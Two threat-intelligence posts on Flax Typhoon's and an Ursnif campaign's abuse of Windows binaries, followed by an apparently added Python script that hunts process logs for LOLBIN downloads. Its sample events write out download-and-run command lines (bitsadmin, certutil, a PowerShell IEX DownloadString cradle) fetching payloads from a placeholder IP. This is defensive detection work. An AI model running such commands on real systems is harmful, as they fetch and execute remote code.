Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and the Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but also provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and #HappyHunting!
#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday
RT @AgidCert
Italian 🇮🇹 #Ursnif campaign themed on #AgenziaEntrate uses #bitsadmin
📬 Subject: "Commissione di vigilanza sul registro tributario" (Supervisory Commission on the Tax Register)
⚔️ TTP:
Email > Link > RAR > HTA > bitsadmin > DLL
💣 #IoC available 👇
🔗 https://cert-agid.gov.it/wp-content/uploads/2023/02/ursnif_agenzia-entrate_07-02-2023.json_.txt
Telegram: https://t.me/certagid/432
#ursnif #AgenziaEntrate #bitsadmin #ioc
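Detection logic for the LOLBIN download patterns the two posts above describe (PowerShell, certutil and bitsadmin downloads in the Flax Typhoon post, and the HTA > bitsadmin > DLL chain in the CERT-AGID post), as an added example that is not part of either post or of the reports they cite. The sample process-creation events, the IP address, the file paths and the rule regexes are constructed for this example; the switch patterns are this example's own assumptions about how each binary is abused, not rules taken from the reports.

```python
"""Hunt process-creation events for LOLBIN download activity (added example)."""
import re
from typing import Dict, List, Optional

# Constructed sample events in a simplified Sysmon Event ID 1 shape (not real telemetry).
# pid 200-400 model the HTA > bitsadmin > DLL chain; 500/600 model certutil and
# PowerShell download cradles; 700/800 are benign uses of the same binaries.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\invoice.hta"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority high http://198.51.100.7/x.dll C:\\Users\\Public\\x.dll"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\x.dll,DllMain"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/a.exe a.exe"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')"},
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify cert.cer"},
    {"pid": 800, "ppid": 100, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /list"},
]

# (rule name, regex over the image file name, regex over the command line).
# Assumed patterns for this example: a URL combined with the download switch of each binary.
RULES = [
    ("bitsadmin_download", r"^bitsadmin\.exe$", r"(?i)/(transfer|addfile)\b.*https?://"),
    ("certutil_download", r"^certutil\.exe$", r"(?i)-urlcache\b.*https?://"),
    ("powershell_download_cradle", r"^(powershell|pwsh)\.exe$",
     r"(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)"),
]

# Parents that indicate a script or document launched the downloader (the HTA stage).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "winword.exe", "excel.exe"}


def image_name(image: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(event: Dict, by_pid: Dict[int, Dict]) -> List[str]:
    """Walk ppid links and return image names from the event up to the root."""
    chain, seen, cur = [], set(), event
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(image_name(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return chain


def extract_url(cmdline: str) -> Optional[str]:
    """Pull the first http(s) URL out of a command line, if any."""
    m = re.search(r"https?://\S+", cmdline)
    return m.group(0) if m else None


def hunt(events: List[Dict]) -> List[Dict]:
    """Apply the rules and enrich each hit with its parent chain and the fetched URL."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e["image"])
        for rule, img_re, cmd_re in RULES:
            if re.search(img_re, name) and re.search(cmd_re, e["cmdline"]):
                chain = ancestry(e, by_pid)
                parent = chain[1] if len(chain) > 1 else None
                findings.append({
                    "rule": rule,
                    "pid": e["pid"],
                    "chain": " <- ".join(chain),
                    "script_host_parent": parent in SCRIPT_HOSTS,
                    "url": extract_url(e["cmdline"]),
                })
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

The benign events (certutil -verify, bitsadmin /list) are deliberately left in: the rules key on the download switch plus a URL, not on the binary alone, which keeps noise down in environments where administrators use these tools legitimately. The script_host_parent flag is what separates the CERT-AGID style chain (mshta spawning bitsadmin) from an interactive download and is worth a higher severity in a real hunt.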